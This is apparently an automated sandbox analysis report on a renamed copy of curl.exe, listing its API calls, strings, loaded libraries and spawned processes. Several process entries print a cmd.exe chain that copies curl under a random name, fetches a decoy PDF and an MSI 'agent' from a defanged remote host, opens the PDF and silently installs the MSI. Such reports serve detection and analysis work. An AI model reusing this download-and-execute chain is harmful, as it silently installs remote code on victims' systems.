Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
3_2_00E4F860 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4F820 CryptAcquireContextA,CryptCreateHash, |
3_2_00E4F820 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, |
3_2_00E4F02B |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E46400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, |
3_2_00E46400 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, |
3_2_00E4EC10 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E46591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
3_2_00E46591 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, |
3_2_00E4C6E0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E43EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, |
3_2_00E43EA4 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, |
3_2_00E4C750 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4C730 CryptHashData, |
3_2_00E4C730 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: -----BEGIN PUBLIC KEY----- |
3_2_00E277F7 |
Source: TNheBOJElq.exe |
Binary or memory string: -----BEGIN PUBLIC KEY----- |
|
Source: |
Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
Source: unknown |
DNS traffic detected: query: 241.42.69.40.in-addr.arpa replaycode: Name error (3) |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1D8C0 recv,WSAGetLastError, |
3_2_00E1D8C0 |
Source: TNheBOJElq.exe |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp |
String found in binary or memory: Usage: curl [options...] <url> |
Source: TNheBOJElq.exe.0.dr |
String found in binary or memory: Usage: curl [options...] <url> |
Source: global traffic |
DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa |
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/P |
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/copyright.htmlD |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/hsts.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/hsts.html# |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/http-cookies.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/http-cookies.html# |
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/docs/sslcerts.html |
Source: TNheBOJElq.exe |
String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl |
Source: TNheBOJElq.exe.0.dr |
String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E11535 |
3_2_00E11535 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E3A8D8 |
3_2_00E3A8D8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E2C1FD |
3_2_00E2C1FD |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1A9B3 |
3_2_00E1A9B3 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E0E127 |
3_2_00E0E127 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1FAEC |
3_2_00E1FAEC |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4CAA0 |
3_2_00E4CAA0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E533B0 |
3_2_00E533B0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E14415 |
3_2_00E14415 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E225B8 |
3_2_00E225B8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E12564 appears 48 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E1D632 appears 245 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E120E6 appears 46 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E1D6AD appears 301 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E0913E appears 64 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E1201D appears 39 times |
|
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: String function: 00E1251E appears 48 times |
|
Source: classification engine |
Classification label: clean8.win@11/3@1/0 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E0310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, |
3_2_00E0310D |
Source: C:\Windows\SysWOW64\cmd.exe |
File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Jump to behavior |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all". |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all". |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all". |
Source: TNheBOJElq.exe |
String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all". |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: TNheBOJElq.exe |
String found in binary or memory: curl: try 'curl --help' for more information |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\" |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn |
|
Source: unknown |
Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: aclayers.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: msi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: srpapi.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: tsappcmp.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\msiexec.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: aclayers.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sfc_os.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: msi.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: tsappcmp.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: |
Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, |
3_2_00E1D33A |
Source: C:\Windows\SysWOW64\cmd.exe |
File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Jump to dropped file |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\msiexec.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
API coverage: 3.3 % |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: TNheBOJElq.exe, 00000003.00000003.1638561356.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000004.00000003.1641387385.0000000003460000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E5155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_00E5155B |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, |
3_2_00E1D33A |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E50CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
3_2_00E50CB4 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E5155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
3_2_00E5155B |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E516BE SetUnhandledExceptionFilter, |
3_2_00E516BE |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn |
Jump to behavior |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\qmqjabdqio.pdf" hxxps://dbs5.pwods.com/download/pdf & "c:\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi hxxps://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn" |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E5137A cpuid |
3_2_00E5137A |
Source: C:\Windows\SysWOW64\cmd.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Queries volume information: C:\ VolumeInformation |
Jump to behavior |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E51775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
3_2_00E51775 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E3A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, |
3_2_00E3A8D8 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E4699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, |
3_2_00E4699F |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E38490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, |
3_2_00E38490 |
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe |
Code function: 3_2_00E1DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, |
3_2_00E1DEDF |